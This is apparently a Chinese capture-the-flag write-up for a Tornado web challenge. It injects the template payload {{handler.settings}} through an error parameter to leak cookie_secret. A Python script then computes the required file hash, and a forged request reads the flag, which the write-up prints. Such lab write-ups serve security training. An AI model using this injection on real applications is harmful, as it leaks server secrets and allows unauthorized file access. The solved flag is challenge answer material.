题目

、

依次点击文件查看

/flag.txt flag in /fllllllllllllag /welcome.txt render /hints.txt md5(cookie_secret+md5(filename))

 tornado模板注入

报cookie

/error?msg={{handler.settings}}

 

 'cookie_secret': '6647062b-e68d-4406-90d3-06e307fa955c'}

使用python脚本进行加密

import hashlib  #选用哈希模块
filename = '/fllllllllllllag'  #文件名
cookie_secret = '6647062b-e68d-4406-90d3-06e307fa955c'#cookie_secret值
filename = hashlib.md5(filename.encode()).hexdigest()#/fllllllllllllag进行32位小写哈希md5加密
a = cookie_secret + filename#md5值进行拼接
filehash = hashlib.md5(a.encode()).hexdigest()#计算拼接后的md5值的md532小写的值
print(filehash)#输出加密后的md532位小写的值

生成

8585e1e95118edc46fe41838cbce8b45

payload

/file?filename=/fllllllllllllag&filehash=8585e1e95118edc46fe41838cbce8b45

 

拿下flag

flag{90ad064b-7371-4b21-af8a-429f484e3466}